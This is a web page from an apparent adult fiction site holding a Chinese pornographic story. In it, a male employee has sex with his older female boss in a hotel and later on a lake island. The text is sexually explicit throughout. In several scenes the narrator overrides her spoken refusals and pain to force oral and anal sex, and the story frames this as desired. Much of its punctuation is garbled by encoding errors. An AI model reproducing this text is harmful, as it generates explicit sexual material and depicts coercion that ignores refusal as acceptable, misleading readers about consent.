• <center id="k6g28"></center>
    <strong id="k6g28"></strong>
  • <strong id="k6g28"></strong>
    您的位置:

    首頁> 現代激情> 淫蕩女上司

    淫蕩女上司 - 淫蕩女上司

    我的上司廖朝鳳雖說已經46歲了,但是依舊風韻十足,性感迷人。絲毫不見一點老態。唱歌跳舞樣樣拿得下,穿著打扮依舊新潮。
      有一次,她帶我到上饒出差。那是個小地方,沒有什麼樣的娛樂活動。到了那兒,我們也只得呆在旅館里。
      晚上,我洗完澡,只穿著襯衣和短褲坐在床邊看我們帶來的資料,以此來打發時間。這時,洗澡完畢的廖朝鳳穿著露肩的吊帶短裙,用毛巾擦拭著頭發走了出來。她見我正認真地看文件,就笑著說:「急啥?有的是空看,不抓緊時間好好休息一下,要當心身體呀!埂咐鄄恢!刮艺f,「我年輕嘛,要不,您帶我來干嘛?」「哦?」廖朝鳳笑了,坐在寬敞的大沙發上,翹起白嫩的大腿,裙內淺色的底褲依稀可見,顯得異常撩人。我有些不敢看,畢竟她是我上司,平常對我的要求也很嚴格,我有點怕她。
      「那你可錯了!顾又f道,「我可不是因為這才帶你來呀!刮矣行┟曰蟮赝骸改鞘菫槭颤N?」
      「你猜猜?」她停止擦拭頭發,笑吟吟地望著我。
      我搖搖頭,雖然有一個念頭在我腦海里閃過,但我沒敢說出來。
      「真笨!沽纬P嬌嗔地瞪了我一眼,拍了拍沙發,「過來,我告訴你!刮矣行┻t疑,但還是下床,走到她身邊坐下。廖朝鳳輕輕笑著,挨近我:「瞧你這遲鈍樣。怕我吃了你呀?」「不是,」我說,「是——」
      「是什麼?」廖朝鳳抓住了我的手,輕輕地摸著。
      我搖了搖頭,還是沒說出來。
      「小笨蛋!沽纬P伸出手,在我的額頭上點了一下,然后欠身起來,又一屁股坐在我大腿上,然后一手勾住我的脖子,一手豎起一根手指頭,在我的唇上劃著:「那,——」她有些口吃地說,「現在,——知道嗎?嗯?」我笑了,就是再笨的人也知道是什麼意思了。我張開嘴,咬住她細長的手指,輕輕地吸吮著,含含糊糊地應到:「知,——知道了!埂干禈!沽纬P嬌嗔地從我口中抽出手指,輕輕地在我的頭上撫摸著:「我還以為——,啊,——」話沒說完,她的身子突然扭動了一下。原來,我在她的腰間搔了她一下,讓她笑出了聲,打斷了她要說的話。我也順勢摟緊了她,另一只手在她光裸,嫩滑的大腿上摸著。
      「小壞蛋!沽纬P嬌嗔地在我臉上擰了一把,一低頭,把她柔軟,濕潤的雙唇貼在了我的唇上,親吻起來。
      她捧著我的臉,手指在我的臉龐上輕輕地摸挲著,嘴里嗯嗯地哼著。另一只手順勢而下,沿著我的脖頸滑到我的胸口前,摸索著我襯衣上的紐扣,一粒粒地解開。然后在我光裸的肩上,背上和胸口上摸著。
      我把一只手伸進她的腋下,一只手伸進她的腿下,把她抱起來,橫放在我的大腿上,順勢把嘴巴蓋在她的唇上,在她的嬌嫩的雙唇上重重地親著。
      我把舌頭撬開她的牙齒,伸進她的小嘴里,慢慢地攪動著,不時和她的香舌纏繞在一起。她仰面朝著我,嘴唇匝弄著我的舌,含弄著,喉嚨咕咕做響,不時把我的唾液全部都吞咽下去。
      她的胸脯緊貼著我,我用手按了按,有點溫濕濕的。我把手挪到她的肩上,輕輕解開吊帶上的結,慢慢地往下扯動,那包裹在粉紅色的奶罩里的乳房完全露在我面前了,只見它急劇地起伏著,撐得奶罩都快掉了。兩粒奶頭在乳罩里凹凸畢現,分外清明。還有幾粒細微的汗珠在白嫩的胸脯上滾動著。一股細細的體香在我鼻孔里彌漫,讓我陶醉。
      我的嘴唇離開她的唇,在她的嫩臉上親著,慢慢順勢而下,吻著她的脖頸和她的胸脯。一只手摸索著挪到她的背后,解開了她奶罩上的紐扣,一把扯落它。她那緊馥馥,白嫩嫩的乳房馬上彈立在我的面前,兩粒褐色的大奶頭因刺激而直挺挺地立著。
      我一見,大喜過望,馬上張嘴含住一粒,緊緊地吮吸著,吸得吱吱有聲,一只手抓住另一只奶房,用勁搓揉著,揉得廖朝鳳嬌聲喊疼:「啊,疼呀!,你,——,你輕點嘛!顾p輕地在我的懷里扭動著,一只手挪到胸前,用力來掰我揉她奶子的手。另一只手挪到我的頭上,拽住我的頭發,把我的頭扯離她的乳房,把她的小嘴堵在我的唇上,用勁親了起來。
     。ǘ
      廖朝鳳吻得很用力,親得嘴唇吱吱直響。她的手按住我的頭,讓我不能動彈,以致于我差一點喘不過氣來。好容易我才從她的吻中掙脫出來,喘息噓噓地說:「寶,——寶貝,讓我,——讓,——看,——!埂缚,——看什麼?」廖朝鳳也有些喘息地說。
      「你的,——你的屁,——屁股呀!刮乙贿呎f,一邊向她的屁股摸去。
      「不,」廖朝鳳撒嬌地說,但并沒有阻止我的手。她的短裙依附圍繞在她的腰間,我騰出一只手,一把扯落它,把它甩在一邊。這時,她那只穿了米色三角褲的下體完全展露在我的面前。
      我支起她的一條腿,讓她的下部能看得更清楚。三角褲很小,只能遮掩住很小的部分,幾縷黑黑的陰毛從三角褲的邊逢里透了出來,三角褲把她下部繃得很緊,中間的部位很明顯地突起,而且,經過剛才的親吻和撫摸,已經有淫水泛出,中部已經被潤濕了一塊。
      我費力地扯下三角褲,只見濃密的陰毛把陰唇遮擋得很嚴實。我用手撥開實潤的陰毛,用食指輕輕地擦拭著她的陰唇。
      廖朝鳳緊摟著我的脖子,喘息聲更急促了:「!——啊,寶——,寶貝,看到,——看到了嗎?——是不是,——嫌我,——的——嫌我的屄老了?」「哪里,」我一邊在她的陰唇上搓揉著,一邊說,「我喜歡!埂甘菃?」廖朝鳳高興地說,把她的兩腿夾緊,把我的手夾在兩腿間不能動彈:「別看我,——我老,我的屄不老!埂甘菃?」我笑了,手在她的胯間轉動了幾下,并起兩指,輕輕地插入到她的陰道里。
      「!」廖朝鳳呻吟著,「是,不怕你有——有啥——啥花樣!刮逸p輕地笑了,把手指用力在她的陰戶里頂了頂,廖朝鳳嬌吟地哼了哼,身子往上縱了縱,順勢又和我親起來。
      慢慢地她挪動她的身體,從我的大腿上移開,雙手按住我的肩,把我壓靠在沙發上,一只手順著我的胸膛往下摸去,一直摸到小腹上,在那里稍微停頓了一下,就伸進了我的短褲中,在我早已硬挺的雞巴上摸了起來。摸了一會兒,又用另一只手扒開我的短褲,好讓我的雞巴整個顯露出來。
      她停止了親嘴,把頭斜靠在我的胸前,一手托著我的卵蛋,輕輕地揉著,一手用力套弄著我的雞巴:「嘻,」廖朝鳳看著我青筋暴漲的雞巴,笑著說:「你的雞巴好大呀!埂复蟛潘!刮夷罅四笏哪套,「寶貝,見過比這大的雞巴嗎?」「去你的!沽纬P嬌嗔地瞪了我一眼,重重的在雞巴上捋了一把。我哈哈笑了起來,把她從我面前推開,站了起來,蹬掉短褲,站在她的面前。我一手在抖動的雞巴上套著,一手按住她的肩膀說:「寶貝,你吃過男人的香蕉嗎?」廖朝鳳有些疑惑地搖搖頭,「什麼香蕉?」
      「喏!刮宜α怂Υ箅u巴。
      「呸!沽纬P啐了一口,有手在雞巴上打了一下:「一邊去!埂赴 刮依L聲音道,「還說不怕新花樣呢,這才剛開始呀!刮覔ё∷牟鳖i,用粗大的雞巴在她的臉上拍打了幾下:「受不了了?再說了,這麼大的雞巴,你先不去去火,呆會不操得你屄腫穴爛呀。來,嘗嘗,你會喜歡的!拐f完,我把雞巴向她嘴里塞去。
      「不嘛!沽纬P撒嬌地把頭撇開,用手攔住了雞巴,「我不喜歡!刮覜]有理會她的不情愿,一把抓住她的手,讓它高舉著,向后按在沙發上,我站到沙發上,大雞巴翹舉在她的臉龐上,我扶住它,在她的粉臉上擦了擦,抵在她的唇邊:「來,寶貝,張口!沽纬P還是有點不情愿,她甩了甩頭,想躲開,但是我舉著雞巴隨著她的頭轉動,僵持了一會,我還是把雞巴塞進她的嘴巴里。
      她的嘴巴很小,粗大的雞巴把她的嘴塞得滿滿的,我輕輕地抽動著,她開始有點不適應,雞巴時不時從她嘴里滑出,但弄了幾次,她也熟練了。她掙脫我的手,一手環抱住我的屁股,不讓我動彈,一只手托著我的卵蛋,用大拇指抵住我的雞巴,然后跪了起來,頭一前一后含弄起我的雞巴來。還不時用舌頭和牙齒輕輕地咬和舔我的龜頭,一陣麻癢癢的感覺讓我好不舒服。
      「!——寶貝,真不錯,誰會相信你沒吃過!刮倚老驳卣f,不時聳聳屁股,把雞巴抵進她的喉嚨。廖朝鳳也不時把雞巴按在我的小肚子上,用舌頭去舔我的卵蛋就這樣玩了好一會兒,我的慾火高漲了起來,我托著雞巴,喘息地對她說:「寶,——寶貝,——來,我——我來操——!埂覆,」廖朝鳳搖搖頭說,「我來!顾蟾庞峙挛彝嫔痘,堅持道。
      她稍稍側了一下身,讓我坐下來,把大雞巴直豎著,她跨跪在我的身上,一手放在我的肩膀上,一手向下,扶住我的雞巴,在她的陰唇上用力擦了幾下,然后用雞巴撥開陰毛,對準她的穴口,一抬她的大屁股,直坐了下去。她柔弱的陰唇包裹著我的雞巴,彷佛穿過了一塊豆腐似的,直插入底。
      廖朝鳳微微吸了一口氣,好像在感受我雞巴的力量,她朝左右擺了擺大屁股,好讓雞巴更順暢,然后把另一只手也搭到我的肩膀上,環摟住我的脖子,身體一起一伏猛烈的動起來。
      我的雙手也緊緊地摟住她的屁股,隨著她的起伏而運動,雞巴每一次的盡根出入,都讓我美不可言。她的乳房也在我的胸前擦摸著,兩粒葡萄般的奶頭直挺挺地立著,讓我真想咬一口。
      肉體撞擊發出的聲音也刺激著我,我的兩手緊緊地抓著她的屁股蛋,抓出了幾道痕印,廖朝鳳頭朝后仰,一邊重重地起落,一邊啊啊的叫著。一會兒,她才喘過氣來,停止了動作,抓住我的頭發,讓我仰起頭,在我的唇上親起來。
      我一邊回吻著她,一邊順著她汗津津的身體,摸著她堅挺的乳房:「咋樣,寶貝,不行了嗎?」我說。
      「有點!顾⒌,「讓我,——我歇息一下!埂改俏艺k?」我捏著她的奶頭道。
      「你,——啊——你還,——還要?」
      「當然,寶貝,我還沒夠呢!刮艺f道。
      「那你,——你操吧!
      她軟軟地從我身上移開,躺倒在沙發上,把腿打開,想讓我把雞巴插進去。我搖搖頭,把她扶起來,讓她趴在沙發上,我站在她身后,在她肥美的大屁股上摸挲著,并在她的小屁眼上輕輕的按摸著。她不知我要干啥,小屁眼癢癢地一縮一縮地:「!癢,你,——你干嘛?」「你說呢?」我把拇指按進了她的屁眼。
      「!」她嬌吟道,用手來抓我的手。我把她手按在她的屁股上,身體也伏在她背上湊進她的耳邊說:「寶貝,你不是說不怕新花樣嗎?現在就有了!拐f完,我立起身,抽出拇指,把雞巴抵在她的屁眼上,用勁送了進去。廖朝鳳猝不急防,一陣疼痛使她馬上喊出了聲:「!你干嘛呀?好疼呀!刮颐νO聛,貼進她,輕揉著她的奶子:「別怕,寶貝,開始有點的,忍一下就好了!埂覆,你,——拔出來!
      廖朝鳳拚命地扭動著屁股,我只好拔出雞巴摟住她說:「寶貝,不想讓我爽嗎?」「不行,你,——」
      我用吻堵住她的話,親了一會,我說:「寶貝,讓我玩玩你的屁眼好嗎?我會小心的。你也會喜歡的!顾晃矣H的迷迷糊糊的,也不知是反對還是同意。我把她摟在我的胯下,把雞巴塞進她的嘴巴里,讓她舔了一會,又讓她趴在沙發上,用她胯間的淫水潤濕了她的屁眼,為了不讓她動彈,我抱緊了她的屁股,再一次把雞巴插入了她的屁眼。
     。ㄈ
      廖朝鳳又疼得嬌叫了一聲,不過,有了一次經歷,她也有點適應,不像剛才那麼反抗,而是咬著嘴唇忍了忍。把她的大屁股擺動了一下,然后,伸出雙手,用勁去掰她的屁股蛋,好使屁眼漲大一點。
      我見她不反對,猛吸了一口氣,屁股往前一挺,粗大的雞巴盡根而入,我的小腹也緊貼在她的屁股上,我抱住了她的大屁股,陰毛扎在她白嫩的屁股上,有一種酥癢癢的感覺。這感覺刺激了我的性慾,使我在她的屁股內猛插。
      廖朝鳳的屁眼很緊,讓我的雞巴抽插得不是很順暢,開始幾下,雞巴回抽時都掉了出來,害得我費力去鉆。慢慢地,她的屁眼變通暢了,我的雞巴也開始覺得滑溜了,抽插得也越來越快。
      廖朝鳳也感覺到了快感,先前的忍痛輕哼也變成了發情的嬌吟:「!——好——好舒服,——再——再來——再用——力——!」一邊喊,一邊把她的大屁股用勁往后頂,好讓我的雞巴插得更深一點。
      她的表現也深深地刺激了我。我身體傾向她,幾乎貼著她的后背,只剩下屁股翹著用勁,我一只手放在她的小肚子上,輕輕地在她陰唇上摸挲著,不時捻幾下她的濃密的陰毛;另一只手伸到她胸口上,抓著她不停抖動的奶房,緊緊地搓著。
      情濃的廖朝鳳側轉著她枕在沙發背上的頭,嬌媚地望著我,嘴里輕輕哼著,臉上帶著淫邪的笑。我一見,忙湊上去,在她的嘴上親起來。我的舌伸進她的嘴里,急促地攪動著,她伸出一只手,輕撫著我的臉,用情地回吻著。
      我的雞巴狠狠撞擊著她的屁眼,發出啪啪的輕響,如鐵般堅硬的卵蛋擊打著她的陰門。她的肌膚也因出汗而變得滑膩異常,幾不能抓。
      不知道過了多久,我感到精關一松,知道馬上要放炮了,馬上急速地在她的浪叫聲中抽插了幾下,拔出了幾近麻木的雞巴,用手擼弄了幾下,一把攬過癱軟在沙發上的廖朝鳳的頭,把雞巴塞進她的口中。
      一股濃精似猛馬脫韁般奔馳而出。數量之多,以致于她都吞咽不及。一些精液順著她的嘴角流了出來。廖朝鳳伸出舌頭舔了舔,然后一歪身,靠在我身上,一只手意猶未盡地在我軟綿綿的雞巴上撫摸著,另一只手放在屁股上,揉著有些紅腫的屁眼,嘴里輕聲地哼著。
      我攬住她渾圓濕滑的肩膀,問道:「怎麼樣?還舒服吧,寶貝?」「去你的!沽纬P嬌嗔地瞪了我一眼,在我的雞巴上捏了一下,「虧你想得出來!埂覆幌矚g嗎?」我抓住了她的乳房,輕輕捏捏她的奶頭。
      廖朝鳳沒有回答,仰起頭在我的臉上親了一下,說:「你和別人也是這樣玩嗎?」我笑了起來,用力摟住她,在她臉上彈了彈:「寶貝,不騙你,我也是第一次玩屁股!埂赴?」廖朝鳳嬌叫著在我的手臂上擰了一把,「小壞蛋,你拿我當試驗品呀?」「哪能呀!刮疑斐鍪,在她依然還沒消腫的屁眼上摸著,「這不好嗎?我的雞巴第一次嘗鮮,你的小屁眼第一次開苞,我們誰都不吃虧!挂幌捳f得廖朝鳳吃吃地笑了。我們歪纏了一會,又摟著洗了一個鴛鴦澡,期間,我又喂她吃了一嘴精液。上床后,雖然她還有興,但卻明顯力不從心,只好把我的雞巴吮吸得硬了,塞進她的屄里,摟著她睡了。
      在上饒呆了幾天,我們辦完事后,決定到一個度假村去玩玩。那是一個人工湖泊。很大也很開闊,環抱著幾十個小島。但沒有多少人玩。
      我們租借了一個橡皮舟,向一個小島劃去。劃到一半,廖朝鳳就脫去外裙,只穿了一件背帶胸罩和一條遮不住屁股的小三角褲。當她背轉身去放衣服時,那白嫩的大屁股在三角褲的襯托下,顯得分外迷人。我的雞巴在泳褲里馬上挺立起來。
      廖朝鳳放好衣服,轉身半躺下,白嫩的大腿舒展著,兩手襯放在舟沿上,舒心地曬著太陽。胸罩托著她的乳房,大半個奶子裸露著,隨著胸口的起伏而顫動。她看見了我的樣子,抿嘴笑了笑,支起身,伸手到舟外,撩起湖水,向我潑來,還用腳扒弄我的大腿。
      我忍不住了,放下槳,挪到她身邊,一把抱住她,在她嘴上親起來。她沒有反抗,把她的舌伸進我的嘴巴里,讓我含著,吸吮著,一手摟住我的腰,一手伸進我的泳褲里,掏出我的大雞巴玩弄著。我也摟住她豐滿的腰身,一只手褪下她左邊的胸帶,在她的奶子上揉著。
      玩到動情處,我的手伸到她的腰際,想扯下她的三角褲。不想她卻開始扭動身體,反抗著:「不,」她掙脫我的吻,一把抓住我的手,「不,現在不。上岸再說!埂笧楹?」我有些不解。
      廖朝鳳拍了拍我的手:「不許偷懶,先劃船!埂改悄愀陕锶俏?」我有些不快。只好挪動身去劃船。
      廖朝鳳笑了笑,也沒有去整理被我脫落的胸罩帶,就讓她那只大奶裸露著。她挨近我,在我臉上親了一口:「寶貝,我是考考你的定力!埂赣胁!刮业吐暪緡A艘痪,用力操起了槳。
     。ㄋ模
      廖朝鳳看著我不高興的樣子,微微笑著挪到我身邊。那裸露的大奶子搖晃著,在我的胸膛上擦拭著。她在我的臉上親了親,然后把頭靠在我的胸口上,一只手摟著我的腰,一只手在我的身上撫摸著。漸漸地往下移動,移到小腹上。在我被雞巴頂起的部位拍了拍,「小壞蛋,」她說,「劃船還不老實!拐f完,她湊到跟前,用力扒掉了我的泳褲,讓我挺立的大雞巴毫無遮擋地露著。然后,她一只手捧著我的卵蛋,一只手用力套弄著雞巴。還把頭側轉來望著我笑。好在我的定力夠好,任她所為。劃了好一會,我停下來,向四邊望了望,然后拿起飲料喝了起來。正在玩弄的廖朝鳳見了,停下來,撲到我身上,撒嬌地說:「我也要,給我一口!刮覄傄f給她,又馬上縮回手,一把摟住她,然后喝了一口,含在嘴里,一低頭,向她嘴里喂去。廖朝鳳仰著頭,吃吃笑著,一口一口地咽了,還順勢和我親吻起來。她的舌伸進我的嘴巴里,深深地攪動著,一雙手在我的身上亂摸著。
      我以為她動了性,一邊含著她的舌頭,用力吮吸著。吻得她晤晤得喘不過氣來,一邊伸手在她的奶子上摸索著,捏著她堅硬的奶頭。然后滑向她的腹部,往她三角褲內摸去。剛觸到她毛絨絨的部分,廖朝鳳卻像觸電般地挺起身,一把抓住我的手,從她胯間抽出來:「不,靠岸再玩!刮矣行a氣地望著她,氣惱地操起了槳。廖朝鳳還是那副笑摸樣,彷佛打贏了一場勝仗似的:「好了,寶貝,別生氣啊。上岸再說!拐f完,她坐起身來,向四處望了望,突然指了指一個地方說:「好了,就到那去!鼓鞘呛垂諒澨幍纳侥_。有一處凹地。四周是密不透風的大樹。臨水還有巨大的巖石遮擋,很隱蔽。我們上了岸,在一處水草茂密的地方鋪好毯子,包一個充氣沙發放在當中。我光著身子弄好一切,走到她跟前,摟住她說:「現在好了吧!埂膏!沽纬P勾住我的脖子,「不怕有人捉你這個小色鬼了!埂腹,」我一邊笑著說,一邊脫掉他的奶罩,「我倒不怕有人抓我,倒是擔心有人把你搶走了!埂赴 獕摹,」她撒嬌地拖長了聲音叫到,用手來擰我的臉。我笑著承受了。順勢吻住了她的嘴。
      廖朝鳳晤晤的嬌吟著,一雙手在我的背上搓揉著,她的胸緊貼著我,豐滿的乳房在我的胸口上蹭著,我感覺到她那硬硬的奶頭在我的胸口上擠壓著。我的手挪到她的三角褲上,從褲縫里伸進去,摸著她豐滿的大屁股。廖朝鳳輕輕抬起腿,用膝蓋輕磨擦著我的大雞巴。嘴里輕聲哼著:「!——好大,——好——好硬呀!埂赶矚g嗎?」我在她的屁股上擰了一把。
      「要!沽纬P扭了扭身子。我松開她,把她推坐在充氣沙發上,我蹲在她面前,脫下她濕漉漉的三角褲,然后坐在她身邊,一手摟住她的腰,一手摸著她毛絨絨的屄說:「寶貝,今天我要把你的三個孔都玩到,好嗎?」廖朝鳳翹起腿,把我的手夾緊:「壞蛋,」她抓住了我的雞巴,「干嘛總想到那里?」「那里緊呀!刮疑斐鍪持,插入了她的陰道。
      「好呀!沽纬P有些惱怒地說:「原來你嫌我老呀,看我怎麼收拾你!梗ㄎ澹
      我看著廖朝鳳嗔怒的樣子,不禁感到十分好笑。我一把摟緊她,抓住她的一只手,放在我的雞巴上,說道:「好了,好了,寶貝。別生氣了。喜歡玩屁眼就是嫌你老嗎?」我在她撅起的小嘴上親了一口,「是人都有愛好嘛。難道你不喜歡?」我問道。
      「去你的!沽纬P在我的雞巴上掐了一把。趁著她消氣的功夫,我在她的屄上摸著:「好了,寶貝,你也惹得我夠久了。你看——」我朝我的雞巴努了努嘴,在她耳邊輕聲說道:「雞巴已經受不了了,讓它解解饞吧!埂富钤,我才不——」
      話沒說完,我就用吻堵住了她的嘴。廖朝鳳晤晤地哼起來,大屁股在我的腿上磨來磨去,趁喘息的空隙嘟嚷地說:「壞,——饞死你!埂改悄闶潜莆矣脧娺!刮夷罅四笏拇竽填^。
      「我——我看你——你敢!沽纬P喘息地說,一手在我的雞巴上套玩著。
      我哈哈一笑,說:「這可是你逼我的呀!
      說完,我站了起來。還沒等我抓住她,廖朝鳳就嬌笑著仰面躺倒在充氣沙發上。我順勢跨坐在她身上,廖朝鳳微微掙扎了一下,就不動了,只剩下輕輕地嬌喘聲。
      我雙手抓住了她的乳放,用里擠壓在一起,形成了一條深深的乳溝。我向前欠欠身子,把我的雞巴夾在了她的乳房之間,慢慢地抽送起來。廖朝鳳懶懶地哼著,兩只手按在我的手上,隨著我的手移動而移動:「!——寶——你又——又再玩——!——什麼呀?」「沒見過吧!刮乙贿吋橹娜榉,一邊用大拇指撥弄著她那直挺挺的奶頭,「今天,我要用雞巴把你的每一處都奸到!拐f完,我的力用得更大了。長長的雞巴差不多都已經頂到了她的喉嚨。
      廖朝鳳想抬起頭看,卻又辦不到,只好左右搖晃著頭,時不時在乳溝處摸一摸我的雞巴。還不時抬起大腿,來頂我的屁股。就這樣歪纏了一會,我松開她,走到她頭前,用雞巴在她的臉上拍了拍。廖朝鳳順勢側翻了一下身,半斜靠在椅背上,用手抓住我的雞巴,輕輕的舔吻起來。
      她把我的雞巴斜舉著,舌頭順著雞巴往上舔,舔到龜頭出處,她的舌在上面輕刮著,不時有唾液形成的細絲掛落下來。然后她把雞巴整個吞沒在她的嘴巴里面,頭慢慢地一仰一伏,雞巴也就這樣在她嘴里出沒著。
      粗大的雞巴把她的嘴撐得很滿,以至于她的嘴都不能用來呼吸。我稍稍挪動了一下,好讓我的雞巴在她嘴里插得更順暢。廖朝鳳的頭靠在我的小腹上,一只手在我的卵蛋上摸著,吸吮了好一會兒,她才吐出雞巴捏在手里輕輕地喘著氣。我扒開她的手,在她的嬌叫聲中,抬起她的雙腳,讓她的大屁股半懸空著,然后把她含了半天的雞巴對準光潔無毛的小屁眼,用力插了進去。
      廖朝鳳微微地挺起了身體,屁股因此而縮緊。我的雞巴也只插入了大半個龜頭。我伸手按住她的小腹,把她摁在沙發上,不讓她滾動,同時,半蹲起來,另一只手扶著雞巴,在她的呻吟聲中一點一點地插了進去。
      她緊縮的肛門如一團棉花,把我的雞巴緊緊纏住,我往外抽也抽不順暢。同時,我抱著她的大腿也不好用力。于是我用力把她側翻過來,臉朝里,屁股對著我,我稍微調整了一下位置,一只手按在她的屁股上,一只手抓住她的乳房,用力抽插起來。
      廖朝鳳被我這樣摁著,絲毫不能動彈,我的抽插也越來越有力。她的黑紅的屁眼被我的雞巴插得時而翻出,時而頂進,我的卵蛋撞擊著她粉嫩的屁股,陰毛也扎在她滑膩的皮膚上,不知道是癢還是其它的啥感覺,也不知她是快感還是難受。
      只見她的兩腿痙攣般地抽動,抓住我放在她屁股上的手不放,嘴里含糊不清地喊著:「!——!好——再插——用力——疼呀。啊——我——」在她的喊聲中,我插得更有勁了。等到我過了興頭,我用力把雞巴頂入到她屁眼盡處,小腹緊貼在她的屁股上,用力磨擦著。我把她翻過來,讓她半坐著,我湊近她的嘴,在它上面吻著。
      廖朝鳳勾著我的脖子,無力地回吻著。這時,她感覺到我的身體在抖動,知道我要放炮了,忙說道:「快拿——拿出來,不——不能在里面!刮椅⑽⒁恍,有用力插了插,然后拔出來,一邊用手捋動著,一邊遞到她嘴邊:「來,——寶貝,接著!沽纬P順從地張開嘴,把剛從屁眼里拔出的雞巴含在嘴巴里,用力吮吸著。我的精關一松,一股濃精噴射而出。廖朝鳳雙手扶著雞巴,不停地吞咽著,把它們全咽下去了。

    * type="text/javascript" src="https://vpk3r6e1.com/788660a2a427ed69e">